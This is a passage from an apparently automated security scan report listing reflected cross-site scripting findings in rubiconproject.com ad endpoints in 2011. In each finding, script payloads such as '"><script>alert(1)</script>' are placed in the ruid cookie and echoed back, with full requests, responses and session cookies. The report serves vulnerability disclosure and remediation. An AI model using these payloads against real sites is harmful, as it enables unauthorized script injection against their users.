Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=bb08b"-alert(1)-"f87da27032a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^12&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62885; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3199

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bb08b"-alert(1)-"f87da27032a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.83. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca7d"-alert(1)-"738fbc0fe4e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=5ca7d"-alert(1)-"738fbc0fe4e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^41&12590^3; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63892; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=5ca7d"-alert(1)-"738fbc0fe4e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.84. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e59"-alert(1)-"1786733ad33 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7725/12338/22682-2.js?cb=61189778&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=b8e59"-alert(1)-"1786733ad33; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^127&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63910; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3251

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=b8e59"-alert(1)-"1786733ad33\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.85. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef72"><script>alert(1)</script>8a74264af07 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=eef72"><script>alert(1)</script>8a74264af07; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:21 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:21 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4e8588ddc30f9fd9f878d610^&12590^35; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63638; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2660

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=eef72"><script>alert(1)</script>8a74264af07" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.86. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90db"-alert(1)-"d0e5f6c768a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22782-15.js?cb=0.7701902575790882&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=d90db"-alert(1)-"d0e5f6c768a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:45 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:45 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^114; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63914; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2952

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=d90db"-alert(1)-"d0e5f6c768a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.87. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c04"><script>alert(1)</script>028f1bd7c76 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=48c04"><script>alert(1)</script>028f1bd7c76; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:14 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:14 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^9&12590^50; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63825; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=48c04"><script>alert(1)</script>028f1bd7c76" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.88. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3ca"><script>alert(1)</script>f299631d149 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=bc3ca"><script>alert(1)</script>f299631d149; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^112&12590^67; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63922; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2959

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=bc3ca"><script>alert(1)</script>f299631d149" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

2.89. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742b8"><script>alert(1)</script>a8c3bae217f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
